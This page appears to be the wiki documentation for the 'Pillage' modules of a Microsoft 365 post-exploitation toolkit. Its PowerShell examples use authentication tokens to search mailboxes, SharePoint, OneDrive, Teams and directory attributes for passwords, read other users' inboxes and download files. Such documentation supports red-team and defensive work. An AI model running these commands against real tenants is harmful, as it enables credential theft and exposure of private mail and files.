Skip to content

Pillage Modules

Jump to bottom
Beau Bullock edited this page Sep 3, 2023 · 22 revisions

Pillage

Invoke-SearchMailbox

This module uses the Graph search API to search for specific terms in emails and allows the user to download them including attachments.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
SearchTerm     - The term you want to search for in the mailbox
MessageCount   - The amount of messages returned in the search results (default = 25)

Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40

Invoke-SearchSharePointAndOneDrive

This module uses the Graph search API to search for specific terms in all SharePoint and OneDrive drives available to the logged in user. It prompts the user which files they want to download.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
SearchTerm     - The term you want to search for. This accepts KQL queries so you can use terms like "filetype", "content", and more.
ResultCount    - The amount of files returned in the search results (default = 25)
PageResults    - Using paging it will return all possible results for a search term

Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password filetype:xlsx'

Invoke-SearchTeams

This module uses the Substrate search API to search for specific terms in Teams channels visible to the logged in user.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
SearchTerm     - The term you want to search for in Teams messages
ResultSize     - The amount of messages returned in the search results (default = 50)

Invoke-SearchTeams -Tokens $tokens -SearchTerm "password" -ResultSize 100

Invoke-SearchUserAttributes

This module will query user attributes from the directory and search through them for a specific term.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
SearchTerm     - The term you want to search across user attributes

Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm "password"

Get-Inbox

This module will pull the latest emails from the inbox of a particular user.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
userid         - Email address of the mailbox you want to read

Get-Inbox -Tokens $tokens -userid

Supplemental Modules

Invoke-DriveFileDownload

If you want to download individual files from SharePoint and OneDrive you can use the DriveID & ItemID output with the Invoke-SearchSharePointAndOneDrive module.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
DriveItemIDs   - A combined value of the drive ID and item ID separated by a colon like this: "b!wDDN4DNGFFufSAEEN8TO3FEfeD9gdE3fm2O_-kGSapywefT_je-ghthhilmtycsZ\:01AVEVEP23EJ43DPEVEGEF7IZ6YEFEF222"
Filename       - The filename you want to download the file to

Invoke-DriveFileDownload -Tokens $tokens -FileName "Passwords.docx" -DriveItemIDs "b!wDDN4DNGFFufSAEEN8TO3FEfeD9gdE3fm2O_-kGSapywefT_je-ghthhilmtycsZ\:01AVEVEP23EJ43DPEVEGEF7IZ6YEFEF222"

Clone this wiki locally